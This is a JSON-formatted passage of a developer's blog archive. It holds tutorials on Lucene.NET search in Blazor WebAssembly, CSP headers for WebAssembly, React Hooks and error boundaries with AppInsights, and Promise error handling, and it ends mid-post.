With this in place Blazor will take care of wiring up the appropriate DOM events so that when the user types and submits to right “backend” is called.\nWhen the search runs it’ll update the SearchResults collection which we can then use a foreach loop over:\n1 2 3 4 5 6 7 @foreach(var result in SearchResults) { <li> <p><a href="@result.Url" title="@result.Title" target="_blank">@result.Title (score: @result.Score.ToString("P2"))</a></p> <p>@result.Description</p> <p class="tags">Tags: @string.Join(" | ", result.Tags)</p> </li> } Here we’re injecting values of our properties into attributes of DOM elements, referencing the .NET objects with the @ prefix, in the same way that has been done with Razor for ASP.NET MVC.\nAnd with that our UI is ready so we can head over and create our “code behind”.\nStep 4 - Creating Our Component Our Component is going to be written in F# and living in the Search.Site class library, so we’ll need to add some NuGet packages:\n1 dotnet add package Microsoft.AspNetCore.Blazor --version 3.1.0-preview3.19555.2 Note: We’re using the preview packages here, just like we’re using the preview .NET Core build, but ensure you use the latest packages available, and they match the ones in the UI project.\nI’m also going to include the excellent TaskBuilder.fs package so that we can use F# computation expressions to work with the C# Task API.\n1 dotnet add package TaskBuilder.fs --version 2.1.0 We’re going to need a complex type to represent the results from our search so we’ll add a file, SearchResult.fs (I use Ionide so it automatically adds it to the fsproj file), and create a Record Type in it:\n1 2 3 4 5 6 7 8 module SearchResult type Post = { Title: string Url: string Tags: string [] Description: string Score: float32 } Now let’s create a file called SearchComponent.fs and we can start scaffolding our component:\n1 2 3 4 5 6 7 8 9 10 11 12 13 namespace Search.Site open Microsoft.AspNetCore.Components open SearchResult type SearchComponent() = inherit ComponentBase() member val IndexLoaded = false with get, set member val SearchTerm = "" with get, set member val SearchResults = Array.empty<Post> with get, set member this.Search() = ignore() And back to Index.razor in the Blazor project we can add @inherits Search.Site.SearchComponent so our Component uses the right base class.\nIt’s now time to start up the server, let’s do it in watch mode so we can keep developing:\n1 dotnet watch run Once the server is up you can navigate to http://localhost:5000 and see the initalisation message!\nStep 5 - Integrating Lucene.NET Our WASM application my be up and running but it’s not doing anything yet and we want it to connect to Lucene.NET to allow us to search. Before we do that though I just want to cover off some of the basics of Lucene.NET.\nLucene.NET 101 Lucene.NET is a port of the Java Lucene project which is a powerful, highly-performant full-text search engine. With it, you can create search indexes, tokenize “documents” into it and search against it using a variety of query styles. The .NET port is an API-compatible port, meaning that the docs for Lucene-Java apply to Lucene.NET. There are a few core pieces that we need to understand to get started.\nLucene centres around a Directory, this is the location where the search index is stored, what you write to with an IndexWriter and query against with an IndexSearcher. 
Everything stored in Lucene is called a Document which is made up of many different fields, each field can be tokenized for access and weighted differently to aid in searching. When it comes to searching you can query the document as a whole, or target specific fields. You can even adjust the weight each token has in the query and how “fuzzy” the match should be for a token. An example query is:\ntitle:react tag:azure^5 -title:DDD Sydney This query will match documents that contain react in the title or azure in the tags excluding any that contain DDD Sydney in the title. The results will then be weighted so that any tagged with azure will be higher up the results list. So you can see how this can be powerful.\nIf you want to learn more about Lucene I’d recommend checking out the Lucene docs and some of my past posts as it’s much more powerful a tool than I want to cover here.\nCreating Our Index We need to add some packages to our project so that we can start using Lucene.NET and we’re going to use the 4.8 release as it supports netstandard2.0, and thus .NET Core. At the time of writing, this is still in beta and we’re using the 4.8.0-beta00006 release. We’ll start by adding the core of Lucene.NET and the analyzer package to Search.Site:\n1 2 dotnet add package Lucene.Net --version 4.8.0-beta00006 dotnet add package Lucene.Net.Analysis.Common --version 4.8.0-beta00006 To create our index we’ll need to create a directory for Lucene.NET to work with, now normally you would use FSDirectory but that requires a file system and we’re running in the WebAssembly sandbox so that’ll be a problem right? It turns out not, for the System.IO API’s used by Blazor (via the mono runtime) map to something in memory (I haven’t worked out just how yet, the mono source code is a tricky thing to trace through).\nNote: You may notice that we’re going to hit up against an issue, everything is in memory. This is a limitation of how we have to work, after all, we’re still in a browser, but it does mean the index is created each page load. In a future post we’ll look at how to do some optimisations to this.\nThe entry point that we want to use for our Component is the OnInitializedAsync as it gives us a convenient point to create the directory and start loading our JSON file into the index, but how will we get the JSON? Via a fetch of course, but since this is .NET, we’ll use HttpClient and inject that as a property of the Component:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 namespace Search.Site open Microsoft.AspNetCore.Components open SearchResult open FSharp.Control.Tasks.V2 open Lucene.Net.Store open Lucene.Net.Index open System open System.Net.Http module Task = let Ignore(resultTask: Task<_>): Task = upcast resultTask type SearchComponent() = inherit ComponentBase() let mutable dir: FSDirectory = null let mutable reader: IndexReader let mutable http: HttpClient = null member val IndexLoaded = false with get, set member val SearchTerm = "" with get, set member val SearchResults = Array.empty<Post> with get, set member this.Search() = ignore() [<Inject>] member _.Http with get () = http and set value = http <- value override this.OnInitializedAsync() = task { let! indexData = Http.GetJsonAsync<SearchData>("https://www.aaron-powell.com/index.json") dir <- FSDirectory.Open(Environment.CurrentDirectory) reader <- DirectoryReader.Open dir } |> Task.Ignore Now it’s time for the fun to start, let’s build an index! 
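For reference, here's a rough sketch of what the SearchData type passed to GetJsonAsync might look like - I've assumed the field names from the JSON output shown back in Step 1, so treat it as illustrative rather than the exact definition:

module Search

open System

// Shape of a single post in index.json (field names assumed from the JSON layout above)
type BlogPost =
    { title: string
      url: string
      date: DateTimeOffset
      tags: string []
      description: string
      content: string }

// The root object: index.json is { "posts": [ ... ] }
type SearchData =
    { posts: BlogPost [] }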
I’m unpacking the JSON into a type defined in F# that maps to the properties of the JSON object and it’s an array so we can iterate over that.\nNote: The System.Json package doesn’t work well with F# record types so I’m using FSharp.SystemTextJson to improve the interop. I’ve also created a custom converter for DateTimeOffset that handles some invalid dates in my post archive.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 override this.OnInitializedAsync() = task { let! indexData = Http.GetJsonAsync<SearchData>("https://www.aaron-powell.com/index.json") dir <- FSDirectory.Open(Environment.CurrentDirectory) reader <- DirectoryReader.Open dir let docs = indexData.Posts |> Array.map (fun post -> let doc = Document() let titleField = doc.AddTextField("title", post.title, Field.Store.YES) titleField.Boost <- 5.f doc.AddTextField("content", post.content, Field.Store.NO) |> ignore doc.AddStringField("url", post.url, Field.Store.YES) |> ignore let descField = doc.AddTextField("desc", post.description, Field.Store.YES) descField.Boost <- 2.f doc.AddStringField("date", DateTools.DateToString(post.date.UtcDateTime, DateTools.Resolution.MINUTE), Field.Store.YES) |> ignore post.tags |> Array.map (fun tag -> StringField("tag", tag, Field.Store.YES)) |> Array.iter doc.Add doc :> IEnumerable<IIndexableField>)) let analyzer = new StandardAnalyzer(LuceneVersion.LUCENE_48) let indexConfig = IndexWriterConfig(LuceneVersion.LUCENE_48, analyzer) use writer = new IndexWriter(dir, indexConfig) writer.AddDocuments docs } |> Task.Ignore This might look a bit clunky but essentially it is creating a Document, adding some fields and returning it cast a IEnumerable<IIndexableField> before creating an analyzer and a writer to write the index.\nLet’s look closely at a few lines:\n1 2 let titleField = doc.AddTextField("title", post.title, Field.Store.YES) titleField.Boost <- 5.f Here we’re creating the field to store the title of the post. It’s created as a TextField, which is a type of field in Lucene that contains multiple terms that need tokenization. This is different from the StringField which expects the value to be treated as a single token (and why we use it for the tags). This means we can search for each word in the title “Implementing Search in Blazor WebAssembly With Lucene.NET” rather than treating it as a whole string.\nYou’ll also notice that this field is stored, denoted by Field.Store.YES, compared to Field.Store.NO of the content. The difference here is on the retrievability of the value. A stored value can be retrieved by a query whereas a non-stored value can’t be. A stored value is also going to take more space up and be slower to access, which is why you want to be selective about what you store in the original format.\nLastly, we’re setting a Boost on this field of 5, meaning that any term that’s found in this field is 5 times more relevant than the same term in a different field. Boosting the field means that if you were to search for react OR azure documents that contain either in the title will be ranked higher in the results than ones that only contain those terms in the content.\nLet’s look at storing the tags:\n1 2 3 post.tags |> Array.map (fun tag -> StringField("tag", tag, Field.Store.YES)) |> Array.iter doc.Add This time we’ve used StringField since it’s only a single term but we aren’t boosting, although it seems like we should, tags are pretty important. 
Since we’re using the StringField which doesn’t get analyzed we can’t boost it, instead, we’ll boost at search time.\nOnce all the posts are turned into documents it’s time to write them to the index and that’s what these 4 lines do:\n1 2 3 4 let analyzer = new StandardAnalyzer(LuceneVersion.LUCENE_48) let indexConfig = IndexWriterConfig(LuceneVersion.LUCENE_48, analyzer) use writer = new IndexWriter(dir, indexConfig) writer.AddDocuments docs When writing a document to an index the fields are analyzed so Lucene knows how to build the index. We’re using the StandardAnalyzer here which combines a few common scenarios, ignoring “stop words” (this, the, and, etc.), removal of . and ' and case normalisation. I have a bit more in-depth information in my post about Lucene analyzers, but this one works for common scenarios on English content. With the analyzer we create an IndexWriter and write the documents to the index, creating something we can search against.\nStep 6 - Searching With the index being created when our Component is loaded the last thing we need is to handle the search and that means filling out the Search function. We’re also going to need another NuGet package for constructing the query:\n1 dotnet add package Lucene.Net.QueryParser --version 4.8.0-beta00006 And now construct the query:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 member this.Search() = match this.SearchTerm with | "" -> ignore() | term -> use analyzer = new StandardAnalyzer(LuceneVersion.LUCENE_48) let qp = MultiFieldQueryParser (LuceneVersion.LUCENE_48, [| "title"; "content"; "tag"; "desc" |], analyzer, dict [ "title", 1.f "tag", 5.f "content", 1.f "desc", 1.f ]) qp.DefaultOperator <- Operator.OR let query = qp.Parse <| term.ToLowerInvariant() let searcher = IndexSearcher reader let sorter = Sort(SortField.FIELD_SCORE, SortField("date", SortFieldType.STRING)) let topDocs = searcher.Search(query, 20, sorter) match topDocs.ScoreDocs.Length with | 0 -> Array.empty | _ -> let maxScore = topDocs.ScoreDocs |> Array.map (fun hit -> (hit :?> FieldDoc).Fields.[0] :?> float32) |> Array.max let res = topDocs.ScoreDocs |> Array.map (fun hit -> let doc = searcher.Doc hit.Doc let score = (hit :?> FieldDoc).Fields.[0] :?> float32 { Score = score / maxScore Title = doc.Get "title" Url = doc.Get "url" Description = doc.Get "desc" Tags = doc.Fields |> Seq.filter (fun f -> f.Name = "tag") |> Seq.map (fun f -> f.GetStringValue()) |> Seq.toArray }) this.SearchResults <- res Well then, that’s… long… let’s break it down. We start with a match expression to ensure there was something to search on, if there isn’t then just ignore, otherwise we need to construct a query.\n1 2 3 4 5 6 7 8 9 let qp = MultiFieldQueryParser (LuceneVersion.LUCENE_48, [| "title"; "content"; "tag"; "desc" |], analyzer, dict [ "title", 1.f "tag", 5.f "content", 1.f "desc", 1.f ]) qp.DefaultOperator <- Operator.OR Since users won’t understand the structure of our search index internally we want to make it easy for them to search and to do that we’re using a Query Parser, in particular, the MultiFieldQueryParser which helps with the construction of queries across multiple fields. After specifying the Lucene version to use we then provide an array of fields to search against (title, content, tag and desc) and then provide a weight for each of the fields. 
Remember earlier I said we could weight tag because it wasn’t tokenized, well this is how we weight it, by providing a dictionary (IDictionary<string, float>) where the key is the field and the value is the weight. Annoyingly we need to provide each field regardless of whether we want to boost it, but that’s how the API works.\nLastly, we set the default operator for the parsed queries to be an OR operator rather than AND, allowing us to cast a wider nett in our search.\nWith the parser ready we can search the index:\n1 2 3 4 5 let query = qp.Parse <| term.ToLowerInvariant() let searcher = IndexSearcher reader let sorter = Sort(SortField.FIELD_SCORE, SortField("date", SortFieldType.STRING)) let topDocs = searcher.Search(query, 20, sorter) Here we’ll use a custom sorter that sorted first on the “score” (how good a match was it) then by the date (newest posts are more relevant). Using a custom sorter does pose a challenge though. When a search is done you receive a score for each document, this is produced by quite a complex algorithm (taking into account term count, boosts, etc.) and the bigger the number the higher in the results it’ll appear. But when a custom sorter is applied the score is no longer the only value of importance and it means if you want to show a “% match” for the document, it’s not so straight forward. So let’s have a look at how we build the results and their scores.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 let maxScore = topDocs.ScoreDocs |> Array.map (fun hit -> (hit :?> FieldDoc).Fields.[0] :?> float32) |> Array.max let res = topDocs.ScoreDocs |> Array.map (fun hit -> let doc = searcher.Doc hit.Doc let score = (hit :?> FieldDoc).Fields.[0] :?> float32 { Score = score / maxScore Title = doc.Get "title" Url = doc.Get "url" Description = doc.Get "desc" Tags = doc.Fields |> Seq.filter (fun f -> f.Name = "tag") |> Seq.map (fun f -> f.GetStringValue()) |> Seq.toArray }) Initially we go through all the matched docs (well, the top 20 which we limited to) and cast them to FieldDoc then extract the first field value, which is our score (cast as a float32) (we know that will be the score because of its position in the sorter) and find the largest one.\nNext we can iterate through the matched documents which gives us an object with the document it, hit.Doc, that we’ll ask the searcher to retrieve the document using. We have to ask the searcher because the document ID is in the context of the query performed.\nWith the document we can extract the stored fields, build our search results object and return it to the UI.\nSearch In Action We’re done now!\nFor this demo above I’ve kept a debugging message where I dumped out the query that was parsed to the console so you can see what was being sent to Lucene.NET to produce the results.\nConclusion I have to admit that when I started trying to build this I didn’t expect it to work. It felt like a rather crazy idea to use what is quite a complex library and compile it to WebAssembly, only to have it “just work”.\nBut as this post (hopefully) demonstrates, it’s not that hard to add search to a Blazor WebAssembly project, I spent more time trying to remember how to use Lucene.NET than I did building the application!\nAnd do you know what’s cool? 
I now have search on my site now!\nThe way that I have it built is a little different to what I’ve described above, but I’ll save some of those advanced concepts for the next post.\n", "id": "2019-11-29-implementing-search-in-blazor-webassembly-with-lucenenet" }, { "title": "Using WebAssembly With CSP Headers", "url": "https://www.aaron-powell.com/posts/2019-11-27-using-webassembly-with-csp-headers/", "date": "Wed, 27 Nov 2019 11:39:21 +1100", "tags": [ "wasm", "javascript" ], "description": "Have you setup Content Security Policies? Do you want to use WebAssembly? Well here's what you need to do", "content": "This year I’ve been doing a bit with WebAssembly, aka WASM, (see tags: wasm) and I’ve been wanting to upload some experiments to my blog. Simple enough, since my website is a static website I just drop in some files to the right folder, upload them with the rest of the website and it just works. Right?\nEnter CSP When I redid my blog as a static website a few years ago I decided that I’d look into having some proper security policies in place for a static site, in the form of Content Security Policy Headers, or CSP Headers. Scott Helme has a great CSP Cheat Sheet if you’re wanting to get started learning about CSP and why it can be valuable to include. I combined this with Report URI, a service that Scott runs, to monitor potentially malicious attacks on my website.\nWhy CSP My site is pretty much read-only, so why would I want CSP on it? Well, the main reason is to get a bit of experience in how to set up CSP, maintain it as a site evolves and generally learn about good security practices for web applications. I have noticed a bonus side effect of it though, because I have to whitelist everything that’s happening on my site I naturally block a lot of stuff that I didn’t know was being injected, such as the Disqus ads! I use Disqus for comments but their ads are served off a different domain to the comment engine, and I’ve never whitelisted that domain, so my site doesn’t have the clickbait sponsored junk all over the bottom of the post!\nI have a rather long CSP in place, you’ll see it if you look into the network requests of your browsers and it does the job nicely. So when I added some WASM to my blog and went to the page I didn’t expect it to fail.\nWASM + CSP After deploying everything and it wasn’t working I opened the dev tools only to find this error:\nWasm code generation disallowed by embedder\nUmm… ok…? That’s a new one to me, I’ve never hit that problem on any of my projects before and it worked on dev, so there must be something different in production, of which the only difference is the CSP headers.\nA bit of research led me to this proposal in the WebAssembly spec. It turns out that because WASM creates a nice little sandbox for apps to play in that also means there’s a nice little sandbox for malicious actors to play in too, and we don’t want that. The proposal is to introduce some new directives into CSP specifically to allow WASM to be executed, but at the moment it can be handled by using the unsafe-eval against script-src. Now, this is risky as you’re punching a rather large hole in your CSP protection, so I’d recommend that you only add that directive to paths that specifically need it, not just every path on your site. 
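To make that concrete, a trimmed-down illustration (not my full policy) of a CSP header that keeps everything locked to your own origin while allowing WASM compilation looks like this:

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval'

Scripts still have to come from your own domain, but the 'unsafe-eval' keyword lets the browser perform the eval-style code generation that the WebAssembly runtime needs.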
But once it’s in place you’re WebAssembly code will be executable!\nConclusion CSP headers are a good idea to have in place, regardless of how complex your site is or what the risk of malicious actors poses to it, it’s better to do security-by-default than as an afterthought, but you will need to watch out if you’re trying to combine this with WebAssembly.\nAt present you need to use unsafe-eval in the script-src (at a minimum) until the wasm-unsafe-eval directive lands.\nNow go forth and be secure!\n", "id": "2019-11-27-using-webassembly-with-csp-headers" }, { "title": "Combining React Hooks With AppInsights", "url": "https://www.aaron-powell.com/posts/2019-11-19-combining-react-hooks-with-appinsights/", "date": "Tue, 19 Nov 2019 11:40:02 +1100", "tags": [ "react", "azure", "javascript" ], "description": "A look at how to create a custom React Hook to work with AppInsights", "content": "The introduction of Hooks into React 16.8 changed the way that people thought about creating components to with within the React life cycle.\nWith the AppInsights React plugin you get a good starting point for integrating AppInsights but it uses a Higher Order Component (HOC) and a custom plugin, and I wanted something that’d integrate nicely into the Hooks pattern. So let’s take a look at how you can go about building that.\nReact Context Before creating my custom Hook I wanted to have a more React way in which I could access AppInsights, so let’s create a React Context to use as a starting point. This will make the plugin available to all children components, and in theory, allow you to have different plugin configurations through different contexts (we won’t try that out, but it’s an idea that you may want to explore yourself). Admittedly, you don’t need to create a Context to expose the plugin, but I just like the way the programmatic model comes together as a result of it.\nWe’ll set up the AppInsights instance like we did in the first article of the series and export the reactPlugin from it as well (previously we’d only exported the AppInsights instance):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 import { ApplicationInsights } from "@microsoft/applicationinsights-web"; import { ReactPlugin, withAITracking } from "@microsoft/applicationinsights-react-js"; import { globalHistory } from "@reach/router"; const reactPlugin = new ReactPlugin(); const ai = new ApplicationInsights({ config: { instrumentationKey: process.env.APPINSIGHTS_KEY, extensions: [reactPlugin], extensionConfig: { [reactPlugin.identifier]: { history: globalHistory } } } }); ai.loadAppInsights(); export default Component => withAITracking(reactPlugin, Component); export const appInsights = ai.appInsights; export { reactPlugin }; Now we can start creating our Context. Let’s start with a new file called AppInsightsContext.js:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 import React, { createContext } from "react"; import { reactPlugin } from "./AppInsights"; const AppInsightsContext = createContext(reactPlugin); const AppInsightsContextProvider = ({ children }) => { return ( <AppInsightsContext.Provider value={reactPlugin}> {children} </AppInsightsContext.Provider> ); }; export { AppInsightsContext, AppInsightsContextProvider }; Great, you have the context ready for use and we have a component that sets up the reactPlugin for us when we use it. 
The last thing to do is to use it within our application somewhere.\nLike in the first post, we’ll update the Layout/index.js file so that we set the context up as high as we can:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 const LayoutWithContext = ({ location, children }) => ( <AppInsightsContextProvider> <> <Headroom upTolerance={10} downTolerance={10} style={{ zIndex: "20", height: "6.5em" }} > <Header location={location} /> </Headroom> <Container text>{children}</Container> <Footer /> </> </AppInsightsContextProvider> ); 🎉 Context is now in use and all children components are able to access it within our children components. And if we wanted to use the standard page interaction tracking of the React plugin we can combine this with the HOC:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 import React from "react"; import Headroom from "react-headroom"; import { Container } from "semantic-ui-react"; import Footer from "../Footer"; import Header from "../Header"; import "semantic-ui-css/semantic.min.css"; import { AppInsightsContextProvider } from "../../AppInsightsContext"; import withAppInsights from "../../AppInsights"; const Layout = withAppInsights(({ location, children }) => ( <> <Headroom upTolerance={10} downTolerance={10} style={{ zIndex: "20", height: "6.5em" }} > <Header location={location} /> </Headroom> <Container text>{children}</Container> <Footer /> </> )); const LayoutWithContext = ({ location, children }) => ( <AppInsightsContextProvider> <Layout location={location} children={children} /> </AppInsightsContextProvider> ); export default LayoutWithContext; Exposing Context as a Hook The final thing we can do with our new Context-provided reactPlugin is to make it easier to access it and to do that we’ll use the useContext Hook. To do this it’s a simple matter of updating AppInsightsContext.js:\n1 const useAppInsightsContext = () => useContext(AppInsightsContext); Our first Hook is ready!\nCreating a Hook for Tracking Events With Context ready we can make some custom Hooks to use within our application. The Hook that we’ll create is going to be a generic one so we can use it in multiple scenarios and work with the trackEvent method. 
Our Hook will take a few pieces of information, the reactPlugin instance to use, the name of the event (which will appear in AppInsights) and some data to track.\n1 2 const useCustomEvent = (reactPlugin, eventName, eventData) => ({}); export default useCustomEvent; Primarily, we’ll need to use the useEffect Hook to call AppInsights, let’s implement taht:\n1 2 3 4 5 6 7 import { useEffect } from "react"; const useCustomEvent = (reactPlugin, eventName, eventData) => { useEffect(() => { reactPlugin.trackEvent({ name: eventName }, eventData); }, [reactPlugin, eventName, eventData]); }; export default useCustomEvent; We’re also making sure that we follow the Rules of Hooks and specifying the dependencies of the useEffect Hook so if they update the effect will run.\nThe first place we’ll use the Hook is on the Add To Cart button, like we did in the first article:\n1 2 3 4 5 6 7 8 9 const AddToCart = ({productId}) => { const [loading, setLoading] = useState(false) const [error, setError] = useState('') const [quantity, setQuantity] = useState(1) const [visible, setVisible] = useState(false) const {addToCart} = useContext(CartContext) const reactPlugin = useAppInsightsContext() useCustomEvent(reactPlugin, 'Added to Cart', quantity) // snip But wait, we have a problem here, now every time the quantity state changes our Effect will run, not when you click the button (or some other controlled action). This isn’t ideal since it’s an input field, so instead, we need to think differently about how to trigger the Effect.\nAdding More Hooks To solve this we’ll add more Hooks! In particular, we’ll add the useState Hook to our custom one.\n1 2 3 4 5 6 7 8 9 10 11 import { useState, useEffect, useRef } from "react"; export default function useCustomEvent(reactPlugin, eventName, eventData) { const [data, setData] = useState(eventData); useEffect(() => { reactPlugin.trackEvent({ name: eventName }, data); }, [reactPlugin, data, eventName]); return setData; } We’ll create some internal state, which I’ve called data, and initialise it with whatever we pass as the eventData. Now in our dependencies we’ll stop using eventData and use data then return the setData state mutation function from our Hook. With this change we will update our usage in Add to Cart like so:\n1 2 3 4 5 6 7 8 9 const AddToCart = ({productId}) => { const [loading, setLoading] = useState(false) const [error, setError] = useState('') const [quantity, setQuantity] = useState(1) const [visible, setVisible] = useState(false) const {addToCart} = useContext(CartContext) const reactPlugin = useAppInsightsContext() const trackAddedToCart = useCustomEvent(reactPlugin, 'Added to Cart') // snip We now have a function that is in the variable trackAddedToCart that can be used at any point in our component to trigger off the effect:\n1 2 3 4 5 6 7 8 9 10 // snip Moltin.addToCart(cartId, productId, quantity).then(() => { addToCart(quantity, cartId); setLoading(false); setQuantity(quantity); setVisible(true); toggleMessage(); trackAddedToCart({ quantity, cartId, productId }); }); // snip Here once the cart has successfully been updated we track the event with some data that we want.\nIgnoring Unwanted Effect Runs If you were to start watching your AppInsight logs now you’ll see that you’re receiving events for the interaction, but you’re also receiving other tracking events from when the component first renders. That isn’t ideal is it! Why does this happen? 
well, the Effect Hook is similar to componentDidUpdate but also componentDidMount, meaning that the Effect runs on the initial pass, which we may not want it to do, especially if the Effect is meant to be triggered by a certain action in our component.\nThankfully, there’s a solution for this and that is to use the useRef Hook. We’ll update our custom Hook to allow us to set whether we want the componentDidMount-equivalent life cycle to trigger the effect or not:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 import { useState, useEffect, useRef } from "react"; export default function useCustomEvent( reactPlugin, eventName, eventData, skipFirstRun = true ) { const [data, setData] = useState(eventData); const firstRun = useRef(skipFirstRun); useEffect(() => { if (firstRun.current) { firstRun.current = false; return; } reactPlugin.trackEvent({ name: eventName }, data); }, [reactPlugin, data, eventName]); return setData; } The argument, skipFirstRun, will be defaulted to true and we create a ref using that value. Then when the Effect runs we check if we are to skip the first run, we update the ref and return early from the function. This works because the ref mutation doesn’t notify changes to the component and thus it won’t re-render.\nConclusion Throughout this post we’ve had a look at how to use Hooks with AppInsights to create a programmatic model that feels like how we would expect a React application to work.\nWe started by introducing Context so that we can resolve the React AppInsights plugin through the React component structure rather than treating it as an external dependency. Next, we created a custom Hook that allows us to track events through the Hook life cycle and learnt a bit about how the Hooks can be triggered and what to do to handle them in the smoothest way possible.\nYou’ll find the sample I used in this post on GitHub with the custom Hook, Add to Cart component and a second usage on the Remove from Cart page.\nAt the time of writing the AppInsights React plugin doesn’t provide a method trackEvent, so I patched it myself when initializing the plugin:\n1 2 3 ReactPlugin.prototype.trackEvent = function(event, customProperties) { this._analyticsPlugin.trackEvent(event, customProperties); }; Bonus Feature - Track Metrics via Hooks The React plugin provides a HOC for tracking metrics such as interaction with a component, so I thought, why not look to see if we can do that with a Hook?\nTo do that I’ve created another custom Hook, useComponentTracking that simulates what the HOC was doing, but doesn’t inject a DOM element, you need to attach it to the element(s) yourself. I’ve updated the Layout component to show how it would work too.\n", "id": "2019-11-19-combining-react-hooks-with-appinsights" }, { "title": "Using React Error Boundaries With AppInsights", "url": "https://www.aaron-powell.com/posts/2019-10-24-using-react-error-boundaries-with-appinsights/", "date": "Thu, 24 Oct 2019 09:02:43 +1100", "tags": [ "react", "azure", "javascript" ], "description": "Combining React Error Boundaries with AppInsights for automatic error logging", "content": "Error Boundaries is a new feature introduced in React 16 to better handle unexpected errors that happen when a component tree is attempting to render.\nThe goal of Error Boundaries is to ensure that when an error does occur during render React has a way to catch that error in a component and handle it gracefully, rather than the component tree being broken and resulting in a white screen for the user. 
This all works by using a new lifecycle method on a Component called componentDidCatch:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 class ErrorBoundary extends React.Component { state = { hasError: false }; componentDidCatch(error, info) { this.setState({ hasError: true }); } render() { if (this.state.hasError) { return <h1 className="error">Error!</h1>; } return this.props.children; } } const App = () => ( <ErrorBoundary> <SomeComponent /> </ErrorBoundary> ); The componentDidCatch method receives two pieces of information, the error that was thrown and info which is the component stack trace. This sounds like information that would be really great for us to track in an error monitoring platform, like, say AppInsights!\nDesigning Our Component Let’s create a generic “App Insights Aware Error Boundary” component, which will allow us to place a boundary somewhere in our component tree but also be generic enough to use in multiple places. After all, we don’t want a single error boundary, that’d be akin to wrapping the whole application with a try/catch block and make it harder to handle errors-at-the-source.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 import React from "react"; import { SeverityLevel } from "@microsoft/applicationinsights-web"; class AppInsightsErrorBoundary extends React.Component { state = { hasError: false }; componentDidCatch(error, info) { this.setState({ hasError: true }); this.props.appInsights.trackException({ error: error, exception: error, severityLevel: SeverityLevel.Error, properties: { ...info } }); } render() { if (this.state.hasError) { const { onError } = this.props; return typeof onError === "function" ? onError() : React.createElement(onError); } return this.props.children; } } Our component will take two props, appInsights and onError. The first is the AppInsights instance you would initialise within an application, as we did in the last post, the other is the component to render or a function to return a component.\nUsing Our Error Boundary I’ve created a demo application using the Gastby eCommerce starter kit (like last time) that shows how you can use an Error Boundary (source code is on my GitHub).\nSince it turns out it’s hard to create a reproducible error in a well-written application I’ve created a fake error scenario, basically whenever you try to add more than 1 item to the cart it’ll throw an error during render (error in codebase).\nBefore seeing the error boundary in action, what would it look like if we didn’t have one?\nWithout the error boundary, we end up with a blank screen because the whole component tree has become corrupt.\nNow we wrap our “buggy” component with an error boundary and if we click the ‘Add to Cart’ button we successfully added to cart, but if when you try to increase the number in the text box it throws an error and the error boundary is displayed.\nHow does that look in code? 
Well, we wrap the component we want with the error boundary (source):\n1 2 3 <ErrorBoundary onError={() => <h1>I believe something went wrong</h1>}> <AddToCart productId={id} /> </ErrorBoundary> Because I’ve got a really basic component to put in when there’s an error, I’m just created an inline function component, but you might want to provide a proper component reference instead.\nInspecting Errors in AppInsights By logging into the Azure Portal and navigating to your AppInsights resource you’ll be able to filter the data to the exceptions you’ve captured:\nThe information might be a little tricky to read if you’re using a minified bundle, but to help with that you can upload your Source Map and have it help give you more detailed information in the logs!\nConclusion AppInsights will automatically capture unhandled errors that reach the onError event in the browser, but when using React you want to do something that’ll allow you to handle the component tree failing to render, which is where Error Boundaries come into play. We can then combine this with AppInsights to have our Error Boundary log those handled errors, you could even provide additional information to the properties of the tracked events if desired.\n", "id": "2019-10-24-using-react-error-boundaries-with-appinsights" }, { "title": "Stateless Serverless with Durable Functions", "url": "https://www.aaron-powell.com/posts/2019-10-23-stateless-serverless-with-durable-functions/", "date": "Wed, 23 Oct 2019 16:00:50 +1100", "tags": [ "serverless", "azure-functions" ], "description": "Here's a video of my Serverless Days Melbourne talk on Durable Functions", "content": "In August I was lucky enough to be invited to speak at Serverless Days Melbourne on the topic of Durable Functions.\nIf you want to check out the talk, the video is online.\n", "id": "2019-10-23-stateless-serverless-with-durable-functions" }, { "title": "Catching All Promise Errors", "url": "https://www.aaron-powell.com/posts/2019-10-11-catching-all-promise-errors/", "date": "Fri, 11 Oct 2019 19:21:50 +1100", "tags": [ "javascript" ], "description": "When a Promise falls in the woods and no one is there to catch it, does it error?", "content": "Recently I was looking into monitoring static websites and it got me thinking about global error handling. There’s a good chance that you’ve come across the onerror global handler that’s triggered when an error happens and there’s no try/catch around it. 
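If you haven't, it looks something like this (a minimal sketch; in a real application you'd forward the error to your monitoring platform rather than the console):
window.onerror = function (message, source, lineno, colno, error) {
  // Fires for uncaught synchronous errors that bubble all the way up.
  console.error(`Unhandled error: ${message} (${source}:${lineno}:${colno})`, error);
  // Return true to suppress the browser's default error reporting.
  return false;
};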
But how does this work when working with Promises?\nPromise Error Handling Let’s take this example:\n1 2 3 4 5 6 7 8 9 10 11 function getJson() { return fetch('https://url/json') .then(res => res.json()); } // or using async/await function async getJsonAsync() { const res = await fetch('https://url/json'); const json = await res.json(); return json; } There are two errors that could happen here, the first is a network failure and the other is the response isn’t valid JSON (side note, fetch doesn’t return an error on a 404 or 500 respose), but we’re not doing anything to handle those errors so we’d need to rewrite it like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 function getJson() { return fetch('https://url/json') .then(res => res.json()) .catch(err => console.log(err)); } // or using async/await function async getJsonAsync() { try { const res = await fetch('https://url/json'); const json = await res.json(); return json; } catch (e) { console.error(e); } } Now we are handling the rejection and our application is all the happier for it.\nHandling the Unhandled In an ideal world, you’re handling all errors that an application may have, but in reality that’s not the case, there will be errors that were not planned for, which is why we have onerror. But, onerror is for handling errors that didn’t occur within a Promise, for that we need 